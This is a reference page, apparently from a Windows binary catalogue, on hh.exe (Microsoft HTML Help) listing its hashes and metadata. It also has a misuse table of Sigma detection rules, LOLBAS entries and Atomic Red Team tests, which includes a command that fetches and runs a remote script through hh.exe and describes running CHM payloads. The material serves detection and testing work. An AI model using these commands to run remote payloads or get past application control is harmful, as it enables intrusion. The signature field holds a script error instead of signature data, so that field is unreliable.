hh.exe
- File Path:
C:\windows\hh.exe
- Description: Microsoft HTML Help Executable
Screenshot
Hashes
Type | Hash |
---|---|
MD5 | B934411DFE7DEACFA95A1255A48133C9 |
SHA1 | ACF68C210CA36F6961AC6F8B92C6EF95FF1CBDF4 |
SHA256 | D0CA9A2D7968065FFC93D10B6848FE05DF5DFA59D4F0A4B3083A95F46E9CB5F2 |
SHA384 | 95A0D2CB66AA706FC937A648AD6745B73C6DC46AE80B2DC1DC3093B746A153A2F3AD73F1108DEE111AC8B82D5B8C08D1 |
SHA512 | 2757855DEFBC9788337B5F55E122245A5603D4C57BDD0E2E98CE2F05B8DEBA8EF3E75BB3DCC1DA32C9FEB75B6F67C78E20DF609D580ED821BAE7940E90297C13 |
SSDEEP | 192:Z2OLEHwPeVY0CMDU/pAmdZGqn3g6o37pJ+pKm5GJ1KDJD/gWcJ:AOLEHVY0CMQGR6o37AI1KDmWcJ |
Signature
- Status: The file C:\windows\hh.exe is not digitally signed. You cannot run this script on the current system. For more information about running scripts and setting execution policy, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170
- Serial: ``
- Thumbprint: ``
- Issuer:
- Subject:
File Metadata
- Original Filename: HH.exe.mui
- Product Name: HTML Help
- Company Name: Microsoft Corporation
- File Version: 6.3.9600.16384 (winblue_rtm.130821-1623)
- Product Version: 6.3.9600.16384
- Language: English (United States)
- Legal Copyright: Microsoft Corporation. All rights reserved.
File Similarity (ssdeep match)
Possible Misuse
The following table contains possible examples of hh.exe
being misused. While hh.exe
is not inherently malicious, its legitimate functionality can be abused for malicious purposes.
Source | Source File | Example | License |
---|---|---|---|
sigma | godmode_sigma_rule.yml | - '\hh.exe' |
DRL 1.0 |
sigma | sysmon_suspicious_remote_thread.yml | - '\hh.exe' |
DRL 1.0 |
sigma | proc_creation_win_hh_chm.yml | title: HH.exe Execution |
DRL 1.0 |
sigma | proc_creation_win_hh_chm.yml | description: Identifies usage of hh.exe executing recently modified .chm files. |
DRL 1.0 |
sigma | proc_creation_win_hh_chm.yml | Image\|endswith: '\hh.exe' |
DRL 1.0 |
sigma | proc_creation_win_html_help_spawn.yml | ParentImage: 'C:\Windows\hh.exe' |
DRL 1.0 |
sigma | proc_creation_win_office_shell.yml | - '\hh.exe' |
DRL 1.0 |
sigma | proc_creation_win_outlook_shell.yml | - '\hh.exe' |
DRL 1.0 |
sigma | proc_creation_win_susp_shell_spawn_by_java.yml | - '\hh.exe' |
DRL 1.0 |
sigma | proc_creation_win_susp_shell_spawn_by_java_keytool.yml | - '\hh.exe' |
DRL 1.0 |
sigma | proc_creation_win_susp_system_user_anomaly.yml | - '\hh.exe' |
DRL 1.0 |
LOLBAS | Hh.yml | Name: Hh.exe |
|
LOLBAS | Hh.yml | - Command: HH.exe http://some.url/script.ps1 |
|
LOLBAS | Hh.yml | - Command: HH.exe c:\windows\system32\calc.exe |
|
LOLBAS | Hh.yml | Usecase: Execute process with HH.exe |
|
LOLBAS | Hh.yml | - Path: C:\Windows\System32\hh.exe |
|
LOLBAS | Hh.yml | - Path: C:\Windows\SysWOW64\hh.exe |
|
atomic-red-team | T1218.001.md | <blockquote>Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program) | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.001.md | A custom CHM file containing embedded payloads could be delivered to a victim then triggered by User Execution. CHM execution may also bypass application application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)</blockquote> | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.001.md | Uses hh.exe to execute a local compiled HTML Help payload. | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.001.md | hh.exe #{local_chm_file} | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.001.md | Uses hh.exe to execute a remote compiled HTML Help payload. | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.001.md | hh.exe #{remote_chm_file} | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.001.md | | hh_file_path | path of modified HH.exe | Path | $env:windir\hh.exe| | MIT License. © 2018 Red Canary |
MIT License. Copyright (c) 2020-2021 Strontic.